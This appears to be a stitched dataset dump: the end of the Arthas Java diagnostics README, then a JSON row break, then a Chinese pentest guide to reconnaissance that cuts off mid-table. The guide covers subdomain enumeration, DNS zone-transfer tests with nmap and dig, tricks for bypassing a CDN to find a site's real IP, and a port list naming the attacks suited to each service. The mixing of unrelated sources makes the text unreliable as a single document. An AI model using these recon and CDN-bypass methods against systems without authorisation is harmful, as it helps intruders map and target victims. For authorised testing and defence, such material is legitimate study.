org.apache.dubbo.demo.provider.DemoServiceImpl sayHello\nPress Ctrl+C to abort.\nAffect(class-cnt:1 , method-cnt:1) cost in 109 ms.\n timestamp class method total success fail avg-rt(ms) fail-rate\n----------------------------------------------------------------------------------------------------------------------------\n 2018-09-20 09:45:32 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 0.67 0.00%\n\n timestamp class method total success fail avg-rt(ms) fail-rate\n----------------------------------------------------------------------------------------------------------------------------\n 2018-09-20 09:45:37 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 1.00 0.00%\n\n timestamp class method total success fail avg-rt(ms) fail-rate\n----------------------------------------------------------------------------------------------------------------------------\n 2018-09-20 09:45:42 org.apache.dubbo.demo.provider.DemoServiceImpl sayHello 5 5 0 0.43 0.00%\n```\n\n#### Time Tunnel(tt)\n\n* https://arthas.aliyun.com/doc/en/tt\n\nRecord method invocation data, so that you can check the method invocation parameters, returned value, and thrown exceptions later. It works as if you could come back and replay the past method invocation via time tunnel.\n\n```bash\n$ tt -t org.apache.dubbo.demo.provider.DemoServiceImpl sayHello\nPress Ctrl+C to abort.\nAffect(class-cnt:1 , method-cnt:1) cost in 75 ms.\n INDEX TIMESTAMP COST(ms) IS-RET IS-EXP OBJECT CLASS METHOD\n-------------------------------------------------------------------------------------------------------------------------------------\n 1000 2018-09-20 09:54:10 1.971195 true false 0x55965cca DemoServiceImpl sayHello\n 1001 2018-09-20 09:54:11 0.215685 true false 0x55965cca DemoServiceImpl sayHello\n 1002 2018-09-20 09:54:12 0.236303 true false 0x55965cca DemoServiceImpl sayHello\n 1003 2018-09-20 09:54:13 0.159598 true false 0x55965cca DemoServiceImpl sayHello\n 1004 2018-09-20 09:54:14 0.201982 true false 0x55965cca DemoServiceImpl sayHello\n 1005 2018-09-20 09:54:15 0.214205 true false 0x55965cca DemoServiceImpl sayHello\n 1006 2018-09-20 09:54:16 0.241863 true false 0x55965cca DemoServiceImpl sayHello\n 1007 2018-09-20 09:54:17 0.305747 true false 0x55965cca DemoServiceImpl sayHello\n 1008 2018-09-20 09:54:18 0.18468 true false 0x55965cca DemoServiceImpl sayHello\n```\n\n#### Classloader\n\n* https://arthas.aliyun.com/doc/en/classloader\n\n```bash\n$ classloader\n name numberOfInstances loadedCountTotal\n BootstrapClassLoader 1 3346\n com.taobao.arthas.agent.ArthasClassloader 1 1262\n java.net.URLClassLoader 2 1033\n org.apache.catalina.loader.ParallelWebappClassLoader 1 628\n sun.reflect.DelegatingClassLoader 166 166\n sun.misc.Launcher$AppClassLoader 1 31\n com.alibaba.fastjson.util.ASMClassLoader 6 15\n sun.misc.Launcher$ExtClassLoader 1 7\n org.jvnet.hk2.internal.DelegatingClassLoader 2 2\n sun.reflect.misc.MethodUtil 1 1\n```\n\n#### Web Console\n\n* https://arthas.aliyun.com/doc/en/web-console\n\n![web console](site/src/site/sphinx/_static/web-console-local.png)\n\n\n#### Profiler/FlameGraph\n\n* https://arthas.aliyun.com/doc/en/profiler\n\n```bash\n$ profiler start\nStarted [cpu] profiling\n```\n\n```\n$ profiler stop\nprofiler output file: /tmp/demo/arthas-output/20211207-111550.html\nOK\n```\n\nView profiler results under arthas-output via browser:\n\n![](site/src/site/sphinx/_static/arthas-output-svg.jpg)\n\n#### Arthas Spring Boot Starter\n\n* [Arthas Spring Boot Starter](https://arthas.aliyun.com/doc/spring-boot-starter.html)\n\n### Known Users\n\nArthas has more than 120 registered users, [View All](USERS.md).\n\nWelcome to register the company name in this issue: https://github.com/alibaba/arthas/issues/111 (in order of registration)\n\n![Alibaba](static/alibaba.png)\n![Alipay](static/alipay.png)\n![Aliyun](static/aliyun.png)\n![Taobao](static/taobao.png)\n![ICBC](static/icbc.png)\n![雪球财经](static/xueqiu.png)\n![顺丰科技](static/sf.png)\n![贝壳找房](static/ke.png)\n![vipkid](static/vipkid.png)\n![百度凤巢](static/baidufengchao.png)\n![有赞](static/youzan.png)\n![科大讯飞](static/iflytek.png)\n![智联招聘](static/zhaopin.png)\n\n### Derivative Projects\n\n* [Bistoury: A project that integrates Arthas](https://github.com/qunarcorp/bistoury)\n* [A fork of arthas using MVEL](https://github.com/XhinLiang/arthas)\n\n### Credits\n\n#### Contributors\n\nThis project exists, thanks to all the people who contributed.\n\n\n\n#### Projects\n\n* [bytekit](https://github.com/alibaba/bytekit) Java Bytecode Kit.\n* [greys-anatomy](https://github.com/oldmanpushcart/greys-anatomy): The Arthas code base has derived from Greys, we thank for the excellent work done by Greys.\n* [termd](https://github.com/alibaba/termd): Arthas's terminal implementation is based on termd, an open source library for writing terminal applications in Java.\n* [crash](https://github.com/crashub/crash): Arthas's text based user interface rendering is based on codes extracted from [here](https://github.com/crashub/crash/tree/1.3.2/shell)\n* [cli](https://github.com/alibaba/cli): Arthas's command line interface implementation is based on cli, open sourced by vert.x\n* [compiler](https://github.com/skalogs/SkaETL/tree/master/compiler) Arthas's memory compiler.\n* [Apache Commons Net](https://commons.apache.org/proper/commons-net/) Arthas's telnet client.\n* [async-profiler](https://github.com/jvm-profiling-tools/async-profiler) Arthas's profiler command.\n"}}},{"rowIdx":531,"cells":{"text":{"kind":"string","value":"# Information Collection For Pentest\n\n## 声明\n\n```\n Author:Qftm\n Data:2020/01/18\n```\n\n## 正文\n\n\"只有不努力的黑客,没有攻不破的系统\"。\n\n在SRC漏洞挖掘或渗透测试中,信息收集占很大一部分,能收集到别人收集不到的资产,就能挖到别人挖不到的洞。\n\nTable of Contents\n=================\n\n- [收集域名信息](#收集域名信息)\n - [Whois 查询](#whois-查询)\n - [备案信息查询](#备案信息查询)\n - [信用信息查询](#信用信息查询)\n - [IP反查站点的站](#ip反查站点的站)\n - [在线网站](#在线网站)\n - [Dnslytics](#dnslytics)\n - [浏览器插件](#浏览器插件)\n - [myip.ms](#myip.ms)\n - [TCPIPUTILS](#tcpiputils)\n - [DNSlytics](#dnslytics-1)\n- [收集相关应用信息](#收集相关应用信息)\n - [微信公众号&微博](#微信公众号微博)\n - [天眼查](#天眼查)\n - [APP](#app)\n - [七麦数据](#七麦数据)\n - [AppStore](#appstore)\n- [收集子域名信息](#收集子域名信息)\n - [在线平台](#在线平台)\n - [第三方平台查询](#第三方平台查询)\n - [权重综合查询](#权重综合查询)\n - [全国政府网站基本数据库](#全国政府网站基本数据库)\n - [IP反查绑定域名网站](#ip反查绑定域名网站)\n - [资产搜索引擎](#资产搜索引擎)\n - [Google语法查询](#google语法查询)\n - [FOFA语法查询](#fofa语法查询)\n - [工具枚举](#工具枚举)\n - [OneForAll](#oneforall)\n - [Layer](#layer)\n - [subDomainsBrute](#subdomainsbrute)\n - [Sublist3r](#sublist3r)\n - [证书透明度公开日志枚举](#证书透明度公开日志枚举)\n - [在线第三方平台查询](#在线第三方平台查询)\n - [工具枚举查询](#工具枚举查询)\n - [Findomain](#findomain)\n - [DNS历史解析](#dns历史解析)\n - [DNS域传送漏洞](#dns域传送漏洞)\n - [DNS记录分类](#dns记录分类)\n - [DNS注册信息](#dns注册信息)\n - [DNS域传送漏洞原理](#dns域传送漏洞原理)\n - [DNS域传送漏洞检测](#dns域传送漏洞检测)\n - [nslookup](#nslookup)\n - [nmap](#nmap)\n - [dig](#dig)\n- [查找真实IP](#查找真实ip)\n - [CDN简介](#cdn简介)\n - [国内外CND](#国内外cnd)\n - [判断目标是否存在CDN](#判断目标是否存在cdn)\n - [Ping目标主域](#ping目标主域)\n - [Nslookup](#nslookup-1)\n - [不同DNS域名解析](#不同dns域名解析)\n - [nslookup默认解析](#nslookup默认解析)\n - [全国Ping](#全国ping)\n - [站长工具](#站长工具)\n - [17CE](#ce)\n - [IPIP](#ipip)\n - [工具查询](#工具查询)\n - [Cdnplanet](#cdnplanet)\n - [绕过CDN查找真实IP](#绕过cdn查找真实ip)\n - [内部邮箱源](#内部邮箱源)\n - [国外请求](#国外请求)\n - [国际Ping](#国际ping)\n - [国外DNS解析](#国外dns解析)\n - [分站域名&C段查询](#分站域名c段查询)\n - [分站域名](#分站域名)\n - [C段查询](#c段查询)\n - [网站漏洞](#网站漏洞)\n - [一些测试文件](#一些测试文件)\n - [SSRF漏洞](#ssrf漏洞)\n - [查询域名解析记录](#查询域名解析记录)\n - [目标网站APP应用](#目标网站app应用)\n - [网络空间引擎搜索](#网络空间引擎搜索)\n- [收集常用端口信息](#收集常用端口信息)\n - [常见端口&解析&总结](#常见端口解析总结)\n - [扫描工具](#扫描工具)\n - [常用扫描工具](#常用扫描工具)\n - [常用扫描工具使用](#常用扫描工具使用)\n - [nmap](#nmap-1)\n - [Masscan](#masscan)\n - [Zmap](#zmap)\n - [御剑高速TCP端口扫描工具](#御剑高速tcp端口扫描工具)\n - [御剑高速端口扫描工具](#御剑高速端口扫描工具)\n - [masnmapscan](#masnmapscan)\n - [网络空间引擎搜索](#网络空间引擎搜索-1)\n - [浏览器插件](#浏览器插件-1)\n - [Shodan](#shodan)\n - [TCPIPUTILS](#tcpiputils-1)\n - [DNSlytics](#dnslytics-2)\n- [指纹识别](#指纹识别)\n - [第三方平台](#第三方平台)\n - [工具](#工具)\n - [浏览器插件](#浏览器插件-2)\n - [Wappalyzer](#wappalyzer)\n- [收集敏感信息](#收集敏感信息)\n - [WAF识别](#waf识别)\n - [wafw00f](#wafw00f)\n - [源码泄露](#源码泄露)\n - [常见源码泄露](#常见源码泄露)\n - [源码泄露扫描工具](#源码泄露扫描工具)\n - [源码泄露利用工具](#源码泄露利用工具)\n - [备份文件泄露](#备份文件泄露)\n - [网站备份文件泄露常见名称](#网站备份文件泄露常见名称)\n - [网站备份文件泄露常见后缀](#网站备份文件泄露常见后缀)\n - [网站备份文件泄露扫描工具](#网站备份文件泄露扫描工具)\n - [Google Hacking](#google-hacking)\n - [常用GoogleHacking语法](#常用googlehacking语法)\n - [其他GoogleHacking语法](#其他googlehacking语法)\n - [GoogleHacking典型用法](#googlehacking典型用法)\n - [JS获取敏感接口](#js获取敏感接口)\n - [JSFinder](#jsfinder)\n - [LinkFinder](#linkfinder)\n - [目录&后台扫描](#目录后台扫描)\n - [越权查询](#越权查询)\n - [代码托管](#代码托管)\n - [Whois&备案查询](#whois备案查询)\n - [公网网盘](#公网网盘)\n - [凌风云搜索](#凌风云搜索)\n - [网站截图](#网站截图)\n - [webscreenshot](#webscreenshot)\n - [获取公开文件](#获取公开文件)\n - [snitch](#snitch)\n - [Google Hacking](#google-hacking-1)\n - [邮箱信息收集](#邮箱信息收集)\n - [Infoga](#infoga)\n - [Google Hacking](#google-hacking-2)\n- [历史漏洞&资产](#历史漏洞资产)\n\n# 收集域名信息\n\n知道目标域名之后,我们要做的第一件事情就是获取域名的注册信息,包括该域名的DNS服务器信息和注册人的联系信息等。\n\n## Whois 查询\n\nWhois 简单来说,就是一个用来查询域名是否已经被注册,以及注册域名的详细信息的数据库(如域名所有人、域名注册商、域名注册日期和过期日期、DNS等)。通过域名Whois服务器查询,可以查询域名归属者联系方式,以及注册和到期时间。\n\n```\nKali下whois查询 https://www.kali.org/downloads/\n\n域名Whois查询 - 站长之家 http://whois.chinaz.com/\n\nWhois 爱站 http://whois.aizhan.com/\n\nip138 https://site.ip138.com/\n\nWhois Lookup https://www.whois.net/\n\nICANN Lookup https://lookup.icann.org/\n\n域名信息查询 - 腾讯云https://whois.cloud.tencent.com/domain?domain=\n\nnicolasbouliane http://nicolasbouliane.com/utils/whois/?url=http://baidu.com\n\n新网 whois信息查询 http://whois.xinnet.com/\n\nIP WHOIS查询 - 站长工具 http://tool.chinaz.com/ipwhois/\n```\n\n![](img/1594459-20200119141241842-1090421140.png)\n\n## 备案信息查询\n\n国内网站注册需要向国家有关部门申请备案,防止网站从事非法活动,而国外网站不需要备案2333。\n\n```\nICP备案查询网 http://www.beianbeian.com/\n\nICP备案查询 - 站长工具 http://icp.chinaz.com/\n\nSEO综合查询 - 爱站 https://www.aizhan.com/seo/\n\n批量查询 - 站长工具 http://icp.chinaz.com/searchs\n\n工业和信息化部ICP/IP/域名信息备案管理 http://www.beian.miit.gov.cn/publish/query/indexFirst.action\n```\n\n![](img/1594459-20200119141328662-1538613661.png)\n\n## 信用信息查询\n\n国家企业信用信息公示系统 http://www.gsxt.gov.cn/index.html\n\n全国企业信息查询 http://company.xizhi.com/\n\n个人信用查询搜索-企业信息查询搜索-统一社会信用代码查询-信用中国 https://www.creditchina.gov.cn/\n\n![](img/1594459-20200119141415498-1786131287.png)\n\n## IP反查站点的站\n\n### 在线网站\n\n#### Dnslytics\n\nDnslytics地址:https://dnslytics.com/\n\n利用Dnslytics反查IP可以得到如下信息\n\n```\nIP information\nNetwork information\nHosting information\nSPAM database lookup\nOpen TCP/UDP ports\nBlocklist lookup\nWhois information\nGeo information\nCountry information\nUpdate information\n```\n\n利用Dnslytics反查域名可以得到如下信息\n\n```\nDomain and Ranking Information\nHosting Information{\n\tA / AAAA Record\n\tNS Record\n\tMX Record\n\tSPF Record\n}\nWeb Information\nWhois Information\n```\n\n## 浏览器插件\n\n通过Google、FireFox等插件的使用,收集域名信息\n\n### myip.ms\n\n![](img/1594459-20200119141519415-625881985.png)\n\n### TCPIPUTILS\n\n![](img/1594459-20200119141640228-860131966.png)\n\n### DNSlytics\n\n![](img/1594459-20200119141656601-1094084026.png)\n\n# 收集相关应用信息\n\n天眼查 https://www.tianyancha.com/\n\n企查查 https://www.qichacha.com/\n\n## 微信公众号&微博\n\n### 天眼查\n\n根据前面获取的企业名称可以获取目标企业的微信公众号、微博、备案站点、软件著作权等信息。\n\n天眼查-商业安全工具 https://www.tianyancha.com/\n\n![](img/1594459-20200119141713825-233472966.png)\n\n微信公众号\n\n![](img/1594459-20200119141726618-1965423664.png)\n\n微博\n\n![](img/1594459-20200119141739367-2099794631.png)\n\n## APP\n\n### 七麦数据\n\nhttps://www.qimai.cn/\n\n通过当前APP查询同开发商应用,得到目标所有APP应用\n\n![](img/1594459-20200119141752877-1887884798.png)\n\n### AppStore\n\nhttps://apps.apple.com/\n\n通过当前APP查询同开发商应用,得到目标所有APP应用\n\n![](img/1594459-20200119141813027-1838023080.png)\n\n# 收集子域名信息\n\n子域名也就是二级域名,是指顶级域名下的域名。假设我们的目标网络规模比较大,直接从主域入手显然是很不理智的,因为对于这种规模的目标,一般其主域都是重点防护区域,所以不如先进入目标的某个子域,然后再想办法迂回接近真正的目标,这无疑是个比较好的选择。那么问题来了,怎样才能尽可能多地搜集目标的高价值子域呢?常用的方法有以下这几种。\n\n## 在线平台\n\n### 第三方平台查询\n\n主要是一些第三方网站和一些博主提供的服务\n\n```\nip138 https://site.ip138.com/\n\n站长工具 http://tool.chinaz.com/subdomain/?domain=\n\nhackertarget https://hackertarget.com/find-dns-host-records/\n\nphpinfo https://phpinfo.me/domain/\n\nt1h2ua https://www.t1h2ua.cn/tools/\n\ndnsdumpster https://dnsdumpster.com/\n\nchinacycc https://d.chinacycc.com/\n\nzcjun http://z.zcjun.com/\n```\n\n### 权重综合查询\n\n爱站 https://www.aizhan.com/seo/\n\n站长工具 http://rank.chinaz.com/all/\n\n![](img/1594459-20200119141832218-1345938531.png)\n\n### 全国政府网站基本数据库\n\nhttp://114.55.181.28/databaseInfo/index\n\n![](img/1594459-20200119141843251-1646076497.png)\n\n### IP反查绑定域名网站\n\nIP关联域名,大部分网站一个IP多个域名\n\n```\nhttp://s.tool.chinaz.com/same?s\n\nhttp://dns.aizhan.com/\n\nhttps://webscan.cc/\n```\n\n## 资产搜索引擎\n\ngoogle、shodan、FOFA、zoomeye\n\n### Google语法查询\n\n搜索子域名 \"site:xxxxx\"\n\n```\nsite:baidu.com\n```\n\n![](img/1594459-20200119141902637-725688631.png)\n\n### FOFA语法查询\n\nhttps://fofa.so/\n\n搜索子域名 \"domain:xxxxx\"\n\n```\ndomain=\"baidu.com\"\n```\n\n\n![](img/1594459-20200119141919931-1425149530.png)\n\n## 工具枚举\n\n常用子域名工具如下(Github上都可搜到)\n\n```\nOneForAll\nLayer\nSublist3r\nsubDomainsBrute\nK8\nwydomain\ndnsmaper\ndnsbrute\nFindomain\nfierce等\n```\n\n个人推荐:`OneForAll`、`Layer`、`Sublist3r`、`subDomainsBrute`\n\n### OneForAll\n\nOneForAll是一款功能强大的子域收集工具,拥有多个模块和接口扫描,收集子域信息很全,包括子域、子域IP、子域常用端口、子域Title、子域Banner、子域状态等。\n\n项目地址:`https://github.com/shmilylty/OneForAll`\n\n子域名收集:`python3 oneforall.py --target=target.com run`\n\n![](img/1594459-20200119141949690-706245006.png)\n\n### Layer\n\nLayer子域名挖掘机的使用方法比较简单,在域名对话框中直接输入域名就可以进行扫描,它的显示界面比较细致,有域名、解析IP、开放端口、Web服务器和网站状态等\n\n![](img/1594459-20200119142000597-497061730.png)\n\n### subDomainsBrute\n\nsubDomainsBrute的特点是可以用小字典递归地发现三级域名、四级域名,甚至五级域名等不容易被探测到的域名。\n\n项目地址:`https://github.com/lijiejie/subDomainsBrute`\n\n子域名收集:`python subDomainsbrute.py xtarget.com`\n\n### Sublist3r\n\nSublist3r也是一个比较常用的工具, 它能列举多种资源,如在Google、Yahoo、 Bing、 Baidu和Ask等搜索引擎中可查到的子域名,还可以列出Netcraft、VirusTotal、ThreatCrowd、 DNSdumpster、SSL Certificates、和Reverse DNS查到的子域名。\n\n项目地址:`https://github.com/aboul3la/Sublist3r`\n\n子域名收集:`python sublist3r.py -d target.com -b -t 50 -p 80,443,21,22`\n\n![](img/1594459-20200119142016505-176536179.png)\n\n## 证书透明度公开日志枚举\n\n\n证书透明度(Certificate Transparency, CT)是证书授权机构(CA) 的一个项目,证书授权机构会将每个SSL/TLS证书发布到公共日志中。一个SSL/TLS证书通常包含域名、子域名和邮件地址, 这些也经常成为攻击者非常希望获得的有用信息。查找某个域名所属证书的最简单的方法就是使用搜索引|擎搜索一些公开的CT日志。\n\n### 在线第三方平台查询\n\n```\ncrt.sh: https://crt.sh\ncensys: https://censys.io\nmyssl:https://myssl.com\n```\n\n```\ncrt:\nhttps://crt.sh/?q=baidu.com\n```\n\n![](img/1594459-20200119142032842-592842557.png)\n![](img/1594459-20200119142046971-121764509.png)\n\n```\ncensys:\nhttps://www.censys.io/certificates?q=baidu.com\n```\n\n\n![](img/1594459-20200119142058672-37856097.png)\n\n### 工具枚举查询\n\n通过工具可以调用各个证书接口进行域名查询 \n\n常用工具\n\n```\nFindomain\nSublist3r(SSL Certificates)等\n```\n\n#### Findomain\n\nFindomain不使用子域名寻找的常规方法,而是使用证书透明度日志来查找子域,并且该方法使其工具更加快速和可靠。该工具使用多个公共API来执行搜索:\n\n```\nCertspotter\nCrt.sh\nVirustotal\nSublist3r\nFacebook \nSpyse (CertDB)\nBufferover\nThreadcrow\nVirustotal with apikey \n```\n\n项目地址:`https://github.com/Edu4rdSHL/findomain`\n\n子域名收集:`findomain -t target.com `\n\n使用所有API搜索子域并将数据导出到CSV文件:`findomain -t target.com -a -o csv`\n\n## DNS历史解析\n\ndnsdb https://www.dnsdb.io\n\nviewdns https://viewdns.info/\n\n## DNS域传送漏洞\n\n目前来看\"DNS域传送漏洞\"已经很少了。\n\n### DNS记录分类\n\n常见的DNS记录有以下几类:\n\n```\nA记录 IP地址记录,记录一个域名对应的IP地址\nAAAA记录 IPv6地址记录,记录一个域名对应的IPv6地址\nCNAME记录 别名记录,记录一个主机的别名\nMX记录 电子邮件交换记录,记录一个邮件域名对应的IP地址\nNS记录 域名服务器记录 ,记录该域名由哪台域名服务器解析\nPTR记录 反向记录,也即从IP地址到域名的一条记录\nTXT记录 记录域名的相关文本信息\n```\n\n### DNS注册信息\n\nWhois查询\n\n### DNS域传送漏洞原理\n\nDNS服务器分为:`主服务器`、`备份服务器`和`缓存服务器`。在主备服务器之间同步数据库,需要使用`“DNS域传送”`。域传送是指备份服务器从主服务器拷贝数据,并用得到的数据更新自身数据库。\n\n若DNS服务器配置不当,可能导致攻击者获取某个域的所有记录。造成整个网络的拓扑结构泄露给潜在的攻击者,包括一些安全性较低的内部主机,如测试服务器。同时,黑客可以快速的判定出某个特定zone的所有主机,收集域信息,选择攻击目标,找出未使用的IP地址,绕过基于网络的访问控制。\n\n### DNS域传送漏洞检测\n\n#### nslookup\n\n基本过程\n\n```\n1) nslookup #进入交互式shell\n2) server dns.xx.yy.zz #设定查询将要使用的DNS服务器\n3) ls xx.yy.zz #列出某个域中的所有域名\n4) exit #退出\n```\n\n漏洞检验-不存在漏洞\n\n```\n> nslookup\nServer: lkwifi.cn\nAddress: 192.168.68.1\n\n*** lkwifi.cn can't find nslookup: Non-existent domain\n> server ss2.bjfu.edu.cn\nDefault Server: ss2.bjfu.edu.cn\nAddress: 202.204.112.67\n\n> ls bjfu.edu.cn\n[ss2.bjfu.edu.cn]\n*** Can't list domain bjfu.edu.cn: Query refused\nThe DNS server refused to transfer the zone bjfu.edu.cn to your computer. If this\nis incorrect, check the zone transfer security settings for bjfu.edu.cn on the DNS\nserver at IP address 202.204.112.67.\n\n> exit\n```\n\n漏洞检验-存在漏洞\n\n```\n> nslookup\n> server dns1.xxx.edu.cn\n> ls xxx.edu.cn\n```\n\n![](img/1594459-20200119142122378-365876425.png)\n\n#### nmap\n\n利用nmap漏洞检测脚本\"dns-zone-transfer\"进行检测\n\n```\nnmap --script dns-zone-transfer --script-args dns-zone-transfer.domain=xxx.edu.cn -p 53 -Pn dns.xxx.edu.cn\n```\n\n```\n--script dns-zone-transfer 表示加载nmap漏洞检测脚本dns-zone-transfer.nse,扩展名.nse可省略\n\n--script-args dns-zone-transfer.domain=xxx.edu.cn 向脚本传递参数,设置列出某个域中的所有域名\n\n-p 53 设置扫描53端口\n\n-Pn 设置通过Ping发现主机是否存活\n```\n\n![](img/1594459-20200119142135615-565066925.png)\n\n#### dig\n\n使用说明 `dig -h`\n\n漏洞测试\n\n```\ndig @dns.xxx.edu.cn axfr xxx.edu.cn\n```\n\n`axfr` 是q-type类型的一种: axfr类型是Authoritative Transfer的缩写,指请求传送某个区域的全部记录。\n\n![](img/1594459-20200119142148997-23789284.png)\n\n# 查找真实IP\n\n如果挖掘的目标购买了CDN服务,可以直接ping目标的域名,但得到的并非真正的目标Web服务器,只是离我们最近的一台目标节点的CDN服务器,这就导致了我们没法直接得到目标的真实IP段范围。\n\n## CDN简介\n\nCDN的全称是Content Delivery Network,即内容分发网络。其基本思路是尽可能避开互联网上有可能影响数据传输速度和稳定性的瓶颈和环节,使内容传输的更快、更稳定。通过在网络各处放置节点服务器所构成的在现有的互联网基础之上的一层智能虚拟网络,CDN系统能够实时地根据网络流量和各节点的连接、负载状况以及到用户的距离和响应时间等综合信息将用户的请求重新导向离用户最近的服务节点上。\n\n## 国内外CND\n\n国内常见CDN\n\n```\n阿里云\n腾讯云\n百度云\n网宿科技(ChinanNet Center)\n蓝汛\n金山云\nUCloud\n网易云\n世纪互联\n七牛云\n京东云等\n```\n\n国外常见CDN\n\n```\nAkamai(阿卡迈)\nLimelight Networks(简称LLNW)\nAWS Cloud(亚马逊)\nGoogle(谷歌)\nComcast(康卡斯特)\n```\n\n## 判断目标是否存在CDN\n\n由于CDN需要代价,一般小企业很大几率不会存在CDN服务。\n\n假如一些企业存在CDN服务,那该如何寻找其真实IP呢,往下看,常见几种手法\n\n### Ping目标主域\n\n通常通过ping目标主域,观察域名的解析情况,以此来判断其是否使用了CDN\n\n对京东和阿里还有一家电器企业进行ping测试,观察域名的解析情况,可以看到京东和阿里都采用了自家CDN,而那个电器企业没有CDN服务\n\n```\nC:\\Users\\Qftm>ping www.jd.com\n\nC:\\Users\\Qftm>ping www.alibaba.com\n\nC:\\Users\\Qftm>ping www.dfle.com.cn\n```\n\n![](img/1594459-20200119142212459-2087766300.png)\n\n### Nslookup\n\n#### 不同DNS域名解析\n\n不同DNS域名解析情况对比,判断其是否使用了CDN\n\n不同DNS解析结果若不一样,很有可能存在CDN服务\n\n```\nC:\\Users\\Qftm>nslookup www.dfle.com.cn 8.8.8.8\n\nC:\\Users\\Qftm>nslookup www.dfle.com.cn 114.114.114.114\n```\n\n![](img/1594459-20200119142328428-196307471.png)\n\n```\nλ Qftm >>>: nslookup www.baidu.com 8.8.8.8\n\nλ Qftm >>>: nslookup www.baidu.com 114.114.114.114\n```\n\n![](img/1594459-20200119142343947-148948923.png)\n\n#### nslookup默认解析\n\n若解析结果有多个,很有可能存在CDN,相反,若解析结果有一个,可能不存在CDN(不能肯定)\n\n![](img/1594459-20200119142357248-1150922309.png)\n\n### 全国Ping\n\n利用全国多地区的ping服务器操作,然后对比每个地区ping出的IP结果,查看这些IP是否一致, 如果都是一样的,极有可能不存在CDN。如果IP大多不太一样或者规律性很强,可以尝试查询这些IP的归属地,判断是否存在CDN。\n\n在线网址\n\n```\nPing检测-站长工具 http://ping.chinaz.com/\n\n17CE https://www.17ce.com/\n\nipip https://tools.ipip.net/newping.php (支持国内、国外)\n```\n\n#### 站长工具\n\n测试目标:`www.jd.com`\n\n![](img/1594459-20200119142412648-1190613587.png)\n\n#### 17CE\n\n测试目标:`www.baidu.com`\n\n![](img/1594459-20200119142428869-1621577710.png)\n\n#### IPIP\n\n![](img/1594459-20200119142440363-2056134896.png)\n\n### 工具查询\n\n这里工具只能作为辅助,有一定误报的概率,只能作为参考\n\n#### Cdnplanet\n\ncdnplanet https://www.cdnplanet.com/tools/cdnfinder/ (查询可能比较慢)\n\n![](img/1594459-20200119142452928-266810115.png)\n\n## 绕过CDN查找真实IP\n\n在确认了目标确实用了CDN以后,就需要绕过CDN寻找目标的真实IP,下面介绍一些常规的方法。\n\n### 内部邮箱源\n\n一般的邮件系统都在内部,没有经过CDN的解析,通过利用目标网站的邮箱注册、找回密码或者RSS订阅等功能,查看邮件、寻找邮件头中的邮件服务器域名IP,ping这个邮件服务器的域名,就可以获得目标的真实IP。\n\n注意:必须是目标自己的邮件服务器,第三方或公共邮件服务器是没有用的。\n\n![](img/1594459-20200119142511035-408073430.png)\n\n### 国外请求\n\n很多时候国内的CDN对国外得覆盖面并不是很广,故此可以利用此特点进行探测。通过国外代理访问就能查看真实IP了,或者通过国外的DNS解析,可能就能得到真实的IP。\n\n#### 国际Ping\n\n国际ping测试站点\n\n```\nipip https://tools.ipip.net/newping.php\n\nASM https://asm.ca.com/en/ping.php\n```\n\n测试站点:`www.yeah.net`\n\n![](img/1594459-20200119142526549-567642204.png)\n\n#### 国外DNS解析\n\n世界各地DNS服务器地址大全:`http://www.ab173.com/dns/dns_world.php`\n\n测试站点:`www.yeah.net`\n\n美国加利福尼亚州山景市谷歌公司DNS服务器: `8.8.4.4`\n\n![](img/1594459-20200119142541360-1030049461.png)\n\n### 分站域名&C段查询\n\n很多网站主站的访问量会比较大,所以主站都是挂CDN的,但是分站可能没有挂CDN,可以通过ping二级域名获取分站IP, 可能会出现分站和主站不是同一个IP但在同一个C段下面的情况,从而能判断出目标的真实IP段。\n\n#### 分站域名\n\n具体见上面**<收集子域名信息>**部分\n\n![](img/1594459-20200119142552726-920748840.png)\n\n#### C段查询\n\n* 在线查询\n\n```\nhttps://phpinfo.me/bing.php\n```\n\n![](img/1594459-20200119142607848-1081123689.png)\n\n* 工具\n\n`K8_C段旁注工具6.0`、`nmap`、`IISPutScanner`、`小米范WEB查找器` 等\n\n`小米范WEB查找器`:http://pan.baidu.com/s/1pLjaQKF\n\n![](img/1594459-20200119142618307-1998638289.png)\n\n* 网络资产搜索引擎\n\nFofa、Shodan、ZoomEye\n\n利用这些网络空间资产搜索引擎来搜索暴露在外的端口信息\n\n利用语法搜索C段信息\n\n![](img/1594459-20200119142628605-1817173510.png)\n\n### 网站漏洞\n\n通过网站的信息泄露如phpinfo泄露,github信息泄露,命令执行等漏洞获取真实ip。\n\n#### 一些测试文件\n\nphpinfo、test等\n\n![](img/1594459-20200119142643031-2126170556.png)\n\n#### SSRF漏洞\n\n服务器主动向外发起连接,找到真实IP地址\n\n### 查询域名解析记录\n\n一般网站从部署开始到使用cdn都有一个过程,周期如果较长的话 则可以通过这类历史解析记录查询等方式获取源站ip,查看IP与域名绑定的历史记录,可能会存在使用CDN前的记录。\n\n在线网站查询\n\n```\ndnsdb https://www.dnsdb.io\n\nNETCRAFT https://sitereport.netcraft.com/?url=\n\nviewdns https://viewdns.info/\n\nthreatbook https://x.threatbook.cn/\n\nsecuritytrails https://securitytrails.com/\n```\n\n![](img/1594459-20200119142656200-2052041466.png)\n\n### 目标网站APP应用\n\n如果目标网站有自己的App,可以尝试利用Fiddler或Burp Suite抓取App的请求,从里面找到目标的真实IP。\n\n### 网络空间引擎搜索\n\nshodan、FOFA、zoomeye\n\n# 收集常用端口信息\n\n在对目标进行漏洞挖掘的过程中,对端口信息的收集是一个很重要的过程, 通过扫描服务器开放的端口以及从该端口判断服务器上存在的服务,就可以对症下药,便于我们渗透目标服务器。\n\n所以在端口渗透信息的收集过程中,我们需要关注常见应用的默认端口和在端口上运行的服务。\n\n端口一般是指TCP/IP协议中的端口,端口号的范围是从0-65535。\n\n## 常见端口&解析&总结\n\n常用的端口利用及解析总结\n\n```\n端口:21 服务:FTP/TFTP/VSFTPD 总结:爆破/嗅探/溢出/后门\n端口:22 服务:ssh远程连接 总结:爆破/openssh漏洞\n端口:23 服务:Telnet远程连接 总结:爆破/嗅探/弱口令\n端口:25 服务:SMTP邮件服务 总结:邮件伪造\n端口:53 服务:DNS域名解析系统 总结:域传送/劫持/缓存投毒/欺骗\n端口:67/68 服务:dhcp服务 总结:劫持/欺骗\n端口:110 服务:pop3 \t\t\t 总结:爆破/嗅探\n端口:139 服务:Samba服务 \t\t总结:爆破/未授权访问/远程命令执行\n端口:143 服务:Imap协议 \t\t总结:爆破161SNMP协议爆破/搜集目标内网信息\n端口:389 服务:Ldap目录访问协议 总结:注入/未授权访问/弱口令\n端口:445 服务:smb 